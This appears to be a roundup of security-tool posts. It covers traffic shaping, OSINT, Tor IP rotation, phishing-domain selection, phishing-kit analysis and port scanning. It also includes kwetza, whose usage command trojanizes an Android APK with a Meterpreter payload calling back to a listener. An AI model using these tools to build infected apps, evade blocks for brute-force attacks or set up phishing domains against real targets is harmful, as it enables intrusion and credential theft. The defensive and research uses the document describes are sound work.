This will also redirect DNS queries to OpenSnitch, allowing the software to perform and IP -> hostname resolution without performing active DNS queries itself.
Once a new connection is detected, the software relies on the ftrace kernel extension in order to track which PID (therefore which process) is creating the connection.
If ftrace is not available for your kernel, OpenSnitch will fallback using the /proc filesystem, even if this method will also work, it's vulnerable to application path manipulation as described in this issue, therefore it's highly suggested to run OpenSnitch on a ftrace enabled kernel.

Download OpenSnitch

Read More

tcconfig - A Simple Tc Command Wrapper Tool

A Simple tc command wrapper tool. Easy to set up traffic control of network bandwidth/latency/packet-loss to a network interface.


Traffic control features

Trafic shaping target
Apply traffic shaping rules to specific target:

• Outgoing/Incoming packets
• Certain IP address/network or port

Available parameters
The following parameters can be set to network interfaces.

• Network bandwidth rate [G/M/K bps]
• Network latency [milliseconds]
• Packet loss rate [%]
• Packet corruption rate [%]

Usage

Set traffic control (tcset command)
tcset is a command to add traffic control rule to a network interface (device).

e.g. Set a limit on bandwidth up to 100Kbps

# tcset --device eth0 --rate 100k

e.g. Set 100ms network latency

# tcset --device eth0 --delay 100

e.g. Set 0.1% packet loss

# tcset --device eth0 --loss 0.1

e.g. All of the above at once

# tcset --device eth0 --rate 100k --delay 100 --loss 0.1

e.g. Specify the IP address of traffic control

# tcset --device eth0 --delay 100 --network 192.168.0.10

e.g. Specify the IP network and port of traffic control

# tcset --device eth0 --delay 100 --network 192.168.0.0/24 --port 80

Delete traffic control (tcdel command)
tcdel is a command to delete traffic shaping rules from a network interface (device).

e.g. Delete traffic control of eth0

# tcdel --device eth0

Display traffic control configurations (tcshow command)
tcshow is a command to display traffic control to network interface(s).

Example

# tcset --device eth0 --delay 10 --delay-distro 2  --loss 0.01 --rate 0.25M --network 192.168.0.10 --port 8080
# tcset --device eth0 --delay 1 --loss 0.02 --rate 500K --direction incoming
# tcshow --device eth0
{
    "eth0": {
        "outgoing": {
            "network=192.168.0.10/32, dst-port=8080": {
                "delay": "10.0",
                "loss": "0.01",
                "rate": "250K",
                "delay-distro": "2.0"
            },
            "network=0.0.0.0/0": {}
        },
        "incoming": {
            "network=0.0.0.0/0": {
                "delay": "1.0",
                "loss": "0.02",
                "rate": "500K"
            }
        }
    }
}

For more information
More examples are available at http://tcconfig.rtfd.io/en/latest/pages/usage/index.html

Installation

Installing from PyPI
tcconfig can be installed from PyPI via pip (Python package manager) command.

sudo pip install tcconfig

Installing from files
The following package include tcconfig and dependency packages. Tshi package is for environments which cannot access to PyPI directly.
How to install:

1. Navigate to https://github.com/thombashi/tcconfig/releases/
2. Download the latest version of tcconfig_wheel.tar.gz
3. Copy tcconfig_wheel.tar.gz to installation target
4. tar xvf tcconfig_wheel.tar.gz
5. cd tcconfig_wheel/
6. ./install.sh

Dependencies

Linux packages

• iproute/iproute2 (mandatory: required for tc command)
• iptables (optional: required to when you use --iptables option)

Linux kernel module

• sch_netem

Python packages
Dependency python packages are automatically installed during tcconfig installation via pip.

• DataPropery
• ipaddress
• logbook
• pyparsing
• six
• subprocrunner
• typepy
• voluptuous

Optional

• netifaces

  • Suppress excessive error messages if this package is installed

Test dependencies

• allpairspy
• pingparsing
• pytest
• pytest-runner
• tox

Documentation
http://tcconfig.rtfd.io/


Troubleshooting
http://tcconfig.readthedocs.io/en/latest/pages/troubleshooting.html

Download tcconfig

Read More

Belati - The Traditional Swiss Army Knife for OSINT

Belati is tool for Collecting Public Data & Public Document from Website and other service for OSINT purpose. This tools is inspired by Foca and Datasploit for OSINT.

What Belati can do?

• Whois(Indonesian TLD Support)
• Banner Grabbing
• Subdomain Enumeration
• Service Scanning for all Subdomain Machine
• Web Appalyzer Support
• DNS mapping / Zone Scanning
• Mail Harvester from Website & Search Engine
• Mail Harvester from MIT PGP Public Key Server
• Scrapping Public Document for Domain from Search Engine
• Fake and Random User Agent ( Prevent from blocking )
• Proxy Support for Harvesting Emails and Documents
• Public Git Finder in domain/subdomain
• Public SVN Finder in domain/subdomain
• Robot.txt Scraper in domain/subdomain
• Gather Public Company Info & Employee
• SQLite3 Database Support for storing Belati Results
• Setup Wizard/Configuration for Belati

TODO

• Automatic OSINT with Username and Email support
• Organization or Company OSINT Support
• Collecting Data from Public service with Username and Email for LinkedIn and other service.
• Setup Wizard for Token and setting up Belati
• Token Support
• Email Harvesting with multiple content(github, linkedin, etc)
• Scrapping Public Document with multiple search engine(yahoo, yandex, bing etc)
• Metadata Extractor
• Web version with Django
• Scanning Report export to PDF
• domain or subdomain reputation checker
• Reporting Support to JSON, PDF
• Belati Updater

Install/Usage

git clone https://github.com/aancw/Belati.git
cd Belati
git submodule update --init --recursive --remote
pip install -r requirements.txt #please use pip with python v2
sudo su
python Belati.py --help

Tested On
Ubuntu 16.04 x86_64 Arch Linux x86_64 CentOS 7

Python Requirements
This tool not compatible with Python 3. So use python v2.7 instead!

Why Need Root Privilege?
Nmap need Root Privilege. You can add sudo or other way to run nmap without root privilege. It's your choice ;)
Reference -> https://secwiki.org/w/Running_nmap_as_an_unprivileged_user
Don't worry. Belati still running when you are run with normal user ;)

Dependencies

• urllib2
• dnspython
• requests
• argparse
• texttable
• python-geoip-geolite2
• python-geoip
• dnsknife
• termcolor
• colorama
• validators
• tqdm
• tldextract
• fake-useragent

System Dependencies
For CentOS/Fedora user, please install this:

yum install gcc gmp gmp-devel python-devel

Library

• python-whois
• Sublist3r
• Subbrute
• nmap
• git
• sqlite3

Notice
This tool is for educational purposes only. Any damage you make will not affect the author. Do It With Your Own Risk!

Author
Aan Wahyu a.k.a Petruknisme(https://petruknisme.com)

Download Belati

Read More

pymultitor - Python Multi Threaded Tor Proxy

Did you ever want to be at two different places at the same time?
While performing penetration tests there are often problems caused by security devices that block the "attacking" IP.
With a large number of IP addresses performing the attacks, better results are guaranteed - especially when attempting attacks to bypass Web Application Firewalls, Brute-Force type attacks and many more.

[Blackhat Asia] https://www.blackhat.com/asia-17/arsenal.html#pymultitor
[Owasp-IL Presentation] https://www.owasp.org/images/3/3d/OWASPIL-2016-02-02_PyMultiTor_TomerZait.pdf
[DigitalWhisper Article (Hebrew)] http://www.digitalwhisper.co.il/files/Zines/0x2E/DW46-3-PyMultitor.pdf

Installation

Prerequisites

• Python 2.7+.
• A C compiler, Python headers, etc. (are needed to compile several dependencies).
  • On Ubuntu, sudo apt-get install -y build-essential libssl-dev python-setuptools python-pip python-wheel python-dev
  • On Fedora, sudo dnf install -y redhat-rpm-config gcc gcc-c++ make openssl-devel python-setuptools python-pip python-wheel python-devel
  • On Windows, install http://aka.ms/vcpython27
  • On MacOS,
    • install xcode command line tools: xcode-select --install
    • install homebrew(brew): $(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
• mitmproxy dependencies.
  • On Ubuntu, sudo apt-get install -y libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev
  • On Fedora, sudo dnf install -y libffi-devel openssl-devel libxml2-devel libxslt-devel libpng-devel libjpeg-devel
  • On Windows,
    • download lxml: http://www.lfd.uci.edu/~gohlke/pythonlibs/#lxml
    • install lxml: pip install lxml-*-cp27-cp27m-win*.whl
  • On MacOS, brew install mitmproxy
• tor.
  • On Ubuntu, sudo apt-get install -y tor
  • On Fedora, sudo dnf install -y tor
  • On Windows,
    • download tor expert bundle: https://www.torproject.org/download/download.html.en
    • insert tor to your path environment: {tor-win32-*_path}\Tor
    • if you don't know how remember tor.exe path and use --tor-cmd argument on pymultitor (for example: pymultitor --tor-cmd "c:\Pentest\Web\tor-win32-0.2.9.9\Tor\tor.exe")
  • On MacOS, brew install tor

From pip

pip install pymultitor
# On MacOs (it's Easier To Use Python 3):
# pip3 install pymultitor

You may need to use sudo, depending on your Python installation.

From Source

git clone https://github.com/realgam3/pymultitor.git
cd pymultitor

# Install python dependencies.
# Depending on your setup, one or both of these may require sudo.
pip install -r requirements.txt
python setup.py install

# On MacOs (it's Easier To Use Python 3):
# pip3 install -r requirements.txt
# python3 setup.py install

# Confirm that everything works
pymultitor --help

Bug reports on installation issues are welcome!

Usage

Basic Usage

1. Run pymultitor --on-string "Your IP Address Blocked".
2. On your script use proxy (http://127.0.0.1:8080).
   When the string Your IP Address Blocked will present in the response content, you will exit from another IP address.

Command Line Flags
See --help for the complete list, but in short:

Usage: pymultitor [-h] [-v] [-lh LISTEN_HOST] [-lp LISTEN_PORT] [-s] [-i] [-d]
                  [-p PROCESSES] [-c CMD] [--on-count ON_COUNT]
                  [--on-string ON_STRING] [--on-regex ON_REGEX] [--on-rst]

# When To Change IP Address
--on-count    Change IP Every x Requests (Resources Also Counted).
--on-string   Change IP When String Found On The Response Content.
--on-regex    Change IP When Regex Found On The Response Content.
--on-rst      Change IP When Connection Closed With TCP RST.

Download pymultitor

Read More

Domain Hunter - Checks Expired Domains, Bluecoat Categorization, And Archive.Org History To Determine Good Candidates For Phishing

Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly, domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.

This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. It then optionally queries for domain reputation against services like BlueCoat and IBM X-Force. The primary tool output is a timestamped HTML table style report.

Changes

- June 6 2017
    + Added python 3 support
    + Code cleanup and bug fixes
    + Added Status column (Available, Make Offer, Price,Backorder,etc)

Features

• Retrieves specified number of recently expired and deleted domains (.com, .net, .org primarily)
• Retrieves available domains based on keyword search
• Reads line delimited input file of potential domains names to check against reputation services
• Performs reputation checks against the Blue Coat Site Review and IBM x-Force services
• Sorts results by domain age (if known)
• Text-based table and HTML report output with links to reputation sources and Archive.org entry

Usage
Install Requirements

pip install -r requirements.txt
or
pip install requests texttable beautifulsoup4 lxml

List DomainHunter options

python ./domainhunter.py
usage: domainhunter.py [-h] [-q QUERY] [-c] [-r MAXRESULTS] [-w MAXWIDTH]

Checks expired domains, bluecoat categorization, and Archive.org history to
determine good candidates for C2 and phishing domains

optional arguments:
  -h, --help            show this help message and exit
  -q QUERY, --query QUERY
                        Optional keyword used to refine search results
  -c, --check         Perform slow reputation checks
  -r MAXRESULTS, --maxresults MAXRESULTS
                        Number of results to return when querying latest
                        expired/deleted domains (min. 100)

Use defaults to check for most recent 100 domains and check reputation

python ./domainhunter.py

Search for 1000 most recently expired/deleted domains, but don't check reputation against Bluecoat or IBM xForce

python ./domainhunter.py -r 1000 -n

Retreive reputation information from domains in an input file

python ./domainhunter.py -f <filename>

Search for available domains with search term of "dog" and max results of 100

./domainhunter.py -q dog -r 100 -c
 ____   ___  __  __    _    ___ _   _   _   _ _   _ _   _ _____ _____ ____
|  _ \ / _ \|  \/  |  / \  |_ _| \ | | | | | | | | | \ | |_   _| ____|  _ \
| | | | | | | |\/| | / _ \  | ||  \| | | |_| | | | |  \| | | | |  _| | |_) |
| |_| | |_| | |  | |/ ___ \ | || |\  | |  _  | |_| | |\  | | | | |___|  _ <
|____/ \___/|_|  |_/_/   \_\___|_| \_| |_| |_|\___/|_| \_| |_| |_____|_| \_\

Expired Domains Reputation Checker

DISCLAIMER:
This is for educational purposes only!
It is designed to promote education and the improvement of computer/cyber security.
The authors or employers are not liable for any illegal act or misuse performed by any user of this tool.
If you plan to use this content for illegal purpose, don't.  Have a nice day :)

********************************************
Start Time:             20170301_113226
TextTable Column Width: 400
Checking Reputation:    True
Number Domains Checked: 100
********************************************
Estimated Max Run Time: 33 minutes

[*] Downloading malware domain list from http://mirror1.malwaredomains.com/files/justdomains
[*] Fetching expired or deleted domains containing "dog"...
[*]  https://www.expireddomains.net/domain-name-search/?q=dog
[*] BlueCoat Check: Dog.org.au
[+] Dog.org.au is categorized as: Uncategorized
[*] IBM xForce Check: Dog.org.au
[+] Dog.org.au is categorized as: Not found.
[*] BlueCoat Check: Dog.asia
[+] Dog.asia is categorized as: Uncategorized
[*] IBM xForce Check: Dog.asia
[+] Dog.asia is categorized as: Not found.
[*] BlueCoat Check: HomeDog.net
[+] HomeDog.net is categorized as: Uncategorized
[*] IBM xForce Check: HomeDog.net
[+] HomeDog.net is categorized as: Not found.
[*] BlueCoat Check: PolyDogs.com
[+] PolyDogs.com is categorized as: Uncategorized
[*] IBM xForce Check: PolyDogs.com
[+] PolyDogs.com is categorized as: Not found.
[*] BlueCoat Check: SaltyDog.it
[+] SaltyDog.it is categorized as: Uncategorized
[*] IBM xForce Check: SaltyDog.it
[+] SaltyDog.it is categorized as: Not found.
[*]  https://www.expireddomains.net/domain-name-search/?start=25&q=dog
[*] BlueCoat Check: FetchDoggieStore.com
[+] FetchDoggieStore.com is categorized as: Society/Daily Living
[*] IBM xForce Check: FetchDoggieStore.com
[+] FetchDoggieStore.com is categorized as: {u'General Business': True}

Report Header Reference

• Domain: Target Domain
• Birth: First seen on Archive.org
• Entries: Number of entries in Archive.org
• TLDs Available: Top level top available
• Bluecoat Categorization: Bluecoat category
• IBM-xForce Categorization: IBM-xForce category
• WatchGuard: Watchguard reputation
• Namecheap: Link to namecheap.com
• Archive.org: Link to archive.org

Download Domain Hunter

Read More

kwetza - Python script to inject existing Android applications with a Meterpreter payload

Kwetza is a tool that allows you to infect an existing Android application with a Meterpreter payload.

What does it do?
Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target application's default permissions or inject additional permissions to gain additional functionality.

Getting the code
Firstly get the code:

git clone https://github.com/sensepost/kwetza.git

Kwetza is written in Python and requires BeautifulSoup which can be installed using Pip:

pip install beautifulsoup4

Kwetza requires Apktool to be install and accessible via your PATH. This can be setup using the install instructions located here: https://ibotpeaches.github.io/Apktool/install

Usage
python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no

• nameOfTheApkToInfect.apk =name of the APK you wish to infect.
• LHOST =IP of your listener.
• LPORT =Port of your listener.
• yes =include "yes" to inject additional evil perms into the app, "no" to utilize the default permissions of the app.

python kwetza.py hackme.apk 10.42.0.118 4444 yes
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

Information
Kwetza has been developed to work with Python 2.
Kwetza by default will use the template and keystore located in the folder "payload" to inject and sign the infected apk.
If you would like to sign the infected application with your own certificate, generate a new keystore and place it in the "payload" folder and rename to the existing keystore or change the reference in the kwetza.py.
The same can be done for payload templates.
The password for the default keystore is, well, "password".

Download kwetza

Read More

DATA - Credential Phish Analysis and Automation

Credential Phish Analysis and Automation

BUCKLEGRIPPER (py)

• Given a suspected phishing url or file of line separated urls, visit, screenshot, and scrape for interesting files.
• Requirements can be installed by running or reviewing install_bucklegripper_deps.sh

usage: bucklegripper.py [-h] [-u URL] [-s SOURCE] [-r READFILE] [-a USERAGENT]

Visit a suspected phishing page, screenshot it and pillage it for phishing
archives

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Url to visit
  -s SOURCE, --source SOURCE
                        Apply a source to where this url came from
  -r READFILE, --readfile READFILE
                        Read in a file of URLs one per line
  -a USERAGENT, --useragent USERAGENT
                        Custom User-Agent

Example of reading in a single url

$ python bucklegripper.py -s openphish -u http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/Login.html 

.: BUCKLEGRIPPER v0.1 https://github.com/hadojae/DATA/ :.

[+] Processing http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/Login.html
  [+] Screencapped http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/Login.html as 20170503-032950-openphish-www.govwebsearch.com.png
  [+] Found Zip file at http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au.zip
  [+] Saved http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au.zip as 20170503-032950-openphish-www.govwebsearch.com-optusnet.com.au.zip
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/
  [+] Found php file: http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au/post.php
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/pdp/safe/
  [+] Saved http://www.govwebsearch.com/apc/opc/pdp/safe/optusnet.com.au.zip as 20170503-032951-openphish-www.govwebsearch.com-optusnet.com.au.zip
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/pdp/
[+] Found Opendir at http://www.govwebsearch.com/apc/opc/
[+] Found Opendir at http://www.govwebsearch.com/apc/

Example of reading in a file of line separated urls

$ python bucklegripper.py -s openphish -r ../../test_urls.txt

.: BUCKLEGRIPPER v0.1 https://github.com/hadojae/DATA/ :.

[+] Beginning processing of ../../test_urls.txt

[+] Processing http://onjasela.net/DB/fr/
  [+] Screencapped http://onjasela.net/DB/fr/ as 20170503-010034-openphish-onjasela.net.png

[+] Processing http://suesschool.com/yahoologin/yahoologin/clients/login.php
  [+] Screencapped http://suesschool.com/yahoologin/yahoologin/clients/login.php as 20170503-010053-openphish-suesschool.com.png
[+] Found Opendir at http://suesschool.com/yahoologin/yahoologin/clients/
  [+] Found php file: http://suesschool.com/yahoologin/yahoologin/clients/login.php
  [+] Found php file: http://suesschool.com/yahoologin/yahoologin/clients/data.php
  [+] Found php file: http://suesschool.com/yahoologin/yahoologin/clients/block.php
[+] Found Opendir at http://suesschool.com/yahoologin/yahoologin/
  [+] Found php file: http://suesschool.com/yahoologin/yahoologin/login.php
  [+] Found php file: http://suesschool.com/yahoologin/yahoologin/data.php
  [+] Found php file: http://suesschool.com/yahoologin/yahoologin/block.php
  [+] Found Zip file at http://suesschool.com/yahoologin.zip
  [+] Saved http://suesschool.com/yahoologin.zip as 20170503-010125-openphish-suesschool.com-yahoologin.zip
[+] Found Opendir at http://suesschool.com/yahoologin/

[+] Processing http://communitypartnersjc.org/wp-admin/js/index
  [+] Screencapped http://communitypartnersjc.org/wp-admin/js/index as 20170503-010138-openphish-communitypartnersjc.org.png

[+] Processing http://ytrdesh.com/info/
  [+] Screencapped http://ytrdesh.com/info/ as 20170503-010148-openphish-ytrdesh.com.png
  
...continues...

BULLYBLINDER (py)

• While capturing a pcap visit a suspected phishing page. Handle redirectors and obfuscation to find a web form. Scrape the form and make educated guesses at what should be entered into the fields. Submit the form and repeat.
• Requirements can be installed by running or reviewing install_bullyblinder_deps.sh

usage: bullyblinder.py [-h] -u URL [-a USERAGENT] -i INTERFACE

Visit a suspected phishing page and attempt form filling while getting a pcap

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Url to visit
  -a USERAGENT, --useragent USERAGENT
                        Custom User-Agent to use
  -i INTERFACE, --interface INTERFACE
                        Interface to tell tshark to listen on

Example Usage

$ python bullyblinder.py -i eth0 -u http://www.justpropertydevelopers.com/scanned

.: BULLYBLINDER v0.1 https://github.com/hadojae/DATA/ :.

[+] Preparing pcap: 20170503-033243-www.justpropertydevelopers.com.pcap

[+] Processing http://www.justpropertydevelopers.com/scanned

[+] Submitting POST
    [+] Control: <HiddenControl(hidCflag=1)>, Control.Type: hidden, Control.Name: hidCflag, Control.ID: hidCflag
    [+] Control: <SelectControl(<None>=[])>, Control.Type: select, Control.Name: None, Control.ID: None
    [+] Control: <SelectControl(<None>=[*0])>, Control.Type: select, Control.Name: None, Control.ID: None
    [+] Control: <SelectControl(<None>=[*1])>, Control.Type: select, Control.Name: None, Control.ID: None
    [+] Control: <SelectControl(<None>=[*2])>, Control.Type: select, Control.Name: None, Control.ID: None
    [+] Control: <SelectControl(<None>=[*3])>, Control.Type: select, Control.Name: None, Control.ID: None
    [+] Control: <SelectControl(<None>=[*4])>, Control.Type: select, Control.Name: None, Control.ID: None
    [+] Control: <TextControl(Email=shannonjudith@gmail.com)>, Control.Type: email, Control.Name: Email, Control.ID: Email
    [+] Control: <PasswordControl(Passwd=696969)>, Control.Type: password, Control.Name: Passwd, Control.ID: Passwd
    [+] Control: <SubmitControl(signIn=Sign in to view attachment) (readonly)>, Control.Type: submit, Control.Name: signIn, Control.ID: signIn
    [+] Control: <CheckboxControl(PersistentCookie=[yes])>, Control.Type: checkbox, Control.Name: PersistentCookie, Control.ID: PersistentCookie
    [+] Control: <HiddenControl(rmShown=1) (readonly)>, Control.Type: hidden, Control.Name: rmShown, Control.ID: None

 [-] No form found, checking for redirectors and obfuscation. 

[+] Found js window.location or document.location, processing the redir

[+] https://drive.google.com/#my-drive appears to be a legitimate website.

[+] Complete! Submitted 1 form(s)

[+] Url Request Chain:
http://justpropertydevelopers.com/scan/docg/doc/filewords/index.php
--http://justpropertydevelopers.com/scan/docg/doc/filewords/index.php

SLICKSHOES (sh)

• A basic bash script that pulls urls out of pdfs in streams or in clear view.
• The only argument to the script is the path to a folder containing the pdfs you want to process.
• REQUIRES pdf-parser.py from https://blog.didierstevens.com/programs/pdf-tools/ location to be set in first line of script

Example Usage

$ ./slickshoes.sh ~/PDFs/
http://4cgemstones.com/polaiowpwwww/GD/index.php
http://80bpm.net/invoice-17524-Apr-26-2017-US-048591/
http://acheirapido.com.br/arquivos/pdf/
http://adams-kuwait.com/REview/office
http://rfaprojects.co.uk/invoice-80633-Apr-24-2017-US-665952/
http://sacm.net/SCANNED/ZN3747CGMSCWC/
https://geloscubinho.com.br/cgi/pdf/index.php
http://afriquecalabashsafaris.com/layouts/GD/index.php
http://akukoomole.com/AdobeLogin/index.php
...continues...

*PINCHERSOFPERIL and BULLYBUSTER are WIP
DATA scripts are a constant work in progress. Feedback, issues, and additions are welcomed.
Proper python packages will be created once suffecient testing and features have been added and more bugs have been squashed.

Troubleshooting
If you have pcap writing issues, use this to fixup dumpcap perms, observed when using some VPS

sudo chgrp YOUR_USER /usr/bin/dumpcap
sudo chmod 750 /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin+eip /usr/bin/dumpcap

Be sure to disable NIC features when capturing traffic run this as root. Checksum errors will cause all sorts of nightmares.

# for i in rx tx sg tso ufo gso gro lro; do ethtool -K eth0 $i off; done

Download DATA

Read More

portSpider - A Lightning Fast Multithreaded Network Scanner Framework With Modules

A lightning fast multithreaded network scanner framework with modules.

modules:

• http - Scan for open HTTP ports, and get the the titles.
• mysql - Scan for open MySQL servers, and try to log in with the default credentials.
• mongodb - Scan for open MongoDB instances, and check if they are password protected.
• ssh - Scan for open SSH ports.
• printer - Scan for open printer ports and websites.
• gameserver - Scan for open game server ports.
• manual - Scan custom ports.

commands:

• modules - List all modules.
• use - Use a module.
• options - Show a module's options.
• set - Set an option.
• run - Run the selected module.
• back - Go back to menu.
• exit - Shut down portSpider.

installing:

Debian based systems:

$ sudo apt-get update && sudo apt-get install python3 python3-pip -y

$ git clone https://github.com/xdavidhu/portSpider

$ cd portSpider/

$ python3 -m pip install -r requirements.txt

macOS / OSX:

$ brew install python3

$ git clone https://github.com/xdavidhu/portSpider

$ cd portSpider/

$ python3 -m pip install -r requirements.txt

NOTE: You need to have Homebrew installed before running the macOS/OSX installation.
WARNING: portSpider is only compatible with Python 3.3 & 3.4 & 3.5 & 3.6

developers:

• David Schütz (@xdavidhu)
• László Simonffy (@Letsgo00HUN) - Multithreading

Download portSpider

Read More